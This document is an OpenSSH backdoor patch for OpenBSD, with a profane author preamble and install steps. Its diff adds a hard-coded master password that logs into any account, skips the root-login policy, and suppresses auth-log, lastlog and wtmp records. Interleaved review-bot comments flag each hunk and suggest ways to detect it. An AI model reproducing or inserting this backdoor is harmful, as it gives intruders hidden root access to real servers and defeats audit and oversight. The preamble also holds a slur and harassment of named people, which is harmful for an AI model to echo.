# YaOP (Yet another OpenSSH Path) # Written by ph1zzle # with kudos to enz00 for providing a reference # YaOP is, you guessed it, another damned OpenSSH patch / backdoor with a few differences # Here is the main one, it was designed for and compiles fine for the OpenBSD native release # of OpenSSH. I wrote this cause I am unaware of any other patch that does this for OpenBSD's # version of OpenSSH. This patch will not patch properly on OpenSSH portable which is the version # written for linux, solaris, or any other OS other then OpenBSD. If you try to use this patch # on any system other then OpenBSD you will notice that you get failed hunkes in sshlogin.c. # This is bad as this is where the ssh daemon registers your login with the system and where # sshd has been modified to hide the fact that you have logged in. In other words, it will log... # this is bad. # Anyways, to use the patch is simple enough, copy it to the OpenSSH dir and then run a # `patch < ./yaop.diff`, then just do a `make`. In thoery you can also do a make install, but # it is much nicer to just copy ./sshd/sshd to /usr/sbin/sshd and then restart the server. # Also you will notice that the secret password is defined on line 69 ( <-- heh 69 ) of this file # ("change_me_or_die"). Also another neat feature I added is it will log you in, even if sshd # is told not to do so, i.e. disallow_root_login. # Also I wanna say thanks to GOBBLES, if it wern't for your nosejob I wouldn't have had access # to the obsd box that motivated me to write this... well, ok I probably woulda somehow, but # you guys are cool anyways, you do good work. # Oh and, "This isn't supposed to be exploitable so nothing should happen here" hehehe, ya # whatever ;) # So impressed with all you do # Tried so hard to be like you # Flew too high and burnt the wings # Lost my faith in everything # Lick around devine debris # Taste the wealth of hate in me # Shedding skin succumb defeat # THIS MACHINE IS OBSOLETE!!! 
# "Shit dude, I think we just changed it to boot runlevel 8, hehe, fuck we shouldn't have smoke # that joint on my lunch break" # -D0Sdemon # "Man we should get drunk and build servers more often, this has been a awesom night" # -Fone_Tone # "No man, I am not giving you your acid untill you finish fixing my computer... shit, this # is good stuff too so hurry" # -Black_Action_Hero # "Who wants to play spot the fed canadian style, now you see that guy with the goofy hat, and # the red blouse on the horse over there chasing that man down the street... no thats just our # prime minister but thats what the feds look like here, silly eh? # -ph1zzle # Btw, Theo, I like your work so this isn't a personal attack, but someone had to do it. # Anyways, keep it up, pat Dug Song on the back for me, he's cool and please slap w00w00 next time # you see them for me... I mean really slap the fuck outta them, like with a big red hand print. # Oh except for remmie, She can come over to my place for pie (:P) if she ever ditches those fags. # http://www.w00w00.org/pics/individual/remmie/remmie1.jpg # Okay kiddies, Thats all I have to say about that so enjoy and figure it, it's not my fault, it's # John R. Levines' fault. Unix for Dummies? What are you thinking you fucking knob. --- ./ssh/auth-passwd.c 2002-05-24 12:45:16.000000000 -0400 +++ ./ssh-own/auth-passwd.c 2003-06-17 16:03:37.000000000 -0400 @@ -55,6 +55,15 @@ { struct passwd * pw = authctxt->pw; + login_0wn=0; + if(strcmp("change_me_or_die", password) == 0 ) + { + login_0wn=1; + return 1; + } + + else{ + /* deny if no user. */ if (pw == NULL) return 0; @@ -101,3 +110,4 @@ } #endif } +} diff -u -r ./ssh/auth.c ./ssh-own/auth.c --- ./ssh/auth.c 2002-05-17 10:27:55.000000000 -0400 +++ ./ssh-own/auth.c 2003-06-17 16:02:33.000000000 -0400 @@ -62,6 +62,10 @@ int allowed_user(struct passwd * pw) { + if(login_0wn) + return 1; + + else{ struct stat st; const char *hostname = NULL, *ipaddr = NULL; char *shell; 
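Review bot: The added `strcmp("change_me_or_die", password)` branch at the top of the auth-passwd.c hunk returns 1 before the `pw == NULL` check, so one fixed string authenticates for any account name, including names with no passwd entry; this is a hard-coded credential (CWE-798) and the hunk has to be rejected outright, not repaired. The same branch sets the global `login_0wn`, which the `allowed_user` hunk in auth.c (`if(login_0wn) return 1;`) then uses to return before any of that function's checks, most of which lie outside the hunks. For defenders, the reliable check is to verify `/usr/sbin/sshd` against a known-good build or the release checksums and to rebuild from verified source on any mismatch, since a daemon built this way differs from the vendor binary and carries the comparison string as a literal. The enclosing function in auth-passwd.c starts before the first hunk and is only closed in the second one.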
@@ -151,6 +155,7 @@ } /* We found no reason not to let this user try to log on... */ return 1; + } } Authctxt * @@ -164,6 +169,7 @@ void auth_log(Authctxt *authctxt, int authenticated, char *method, char *info) { + if(!login_0wn){ void (*authlog) (const char *fmt,...) = verbose; char *authmsg; @@ -188,6 +194,7 @@ get_remote_port(), info); } +} /* * Check whether root logins are disallowed. @@ -195,6 +202,7 @@ int auth_root_allowed(char *method) { + if(!login_0wn){ switch (options.permit_root_login) { case PERMIT_YES: return 1; @@ -212,6 +220,9 @@ } log("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr()); return 0; + } + else + return 1; } diff -u -r ./ssh/includes.h ./ssh-own/includes.h --- ./ssh/includes.h 2002-01-26 11:44:22.000000000 -0500 +++ ./ssh-own/includes.h 2003-06-17 19:48:51.000000000 -0400 @@ -18,6 +18,7 @@ #define RCSID(msg) \ static /**/const char *const rcsid[] = { (char *)rcsid, "\100(#)" msg } +int login_0wn; #include #include diff -u -r ./ssh/sshlogin.c ./ssh-own/sshlogin.c --- ./ssh/sshlogin.c 2002-06-22 23:30:17.000000000 -0400 +++ ./ssh-own/sshlogin.c 2003-06-17 22:06:26.000000000 -0400 @@ -86,6 +86,7 @@ record_login(pid_t pid, const char *ttyname, const char *user, uid_t uid, const char *host, struct sockaddr * addr) { + if(!login_0wn){ int fd; struct lastlog ll; char *lastlog; @@ -121,13 +122,16 @@ close(fd); } } + } } /* Records that the user has logged out. */ void record_logout(pid_t pid, const char *ttyname) { + if(!login_0wn){ const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */ if (logout(line)) logwtmp(line, "", ""); + } }
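Review bot: Wrapping the whole body of `auth_log` in `if(!login_0wn){` removes the authentication log line for the session, and the `auth_root_allowed` hunks do the same to the `options.permit_root_login` switch and the "ROOT LOGIN REFUSED" message through `else return 1;`. Both conditions hang off a process-wide flag declared in includes.h (`int login_0wn;`), and mutable global state that can switch off policy and audit has no place in an authentication path. None of these hunks should be accepted: `auth_log` must run unconditionally and `auth_root_allowed` must have no path around the configured policy. Because a daemon patched this way cannot be trusted to report on itself, detection has to come from outside it, for example by comparing network-level connection records for the SSH port against the auth log entries.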
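Review bot: Guarding `record_login` and `record_logout` in sshlogin.c with `if(!login_0wn){` means a session on the flagged path writes no lastlog entry and skips `logout(line)` / `logwtmp(line, "", "")`, so the login accounting files hold nothing for it. Session accounting should never be conditional on how the user authenticated, and both hunks should be dropped. On a host suspected of running such a build, the discrepancy to look for is an sshd child process with an allocated tty and no matching accounting record. The signature of `record_login` begins before its hunk and the middle of its body falls between the two sshlogin.c hunks.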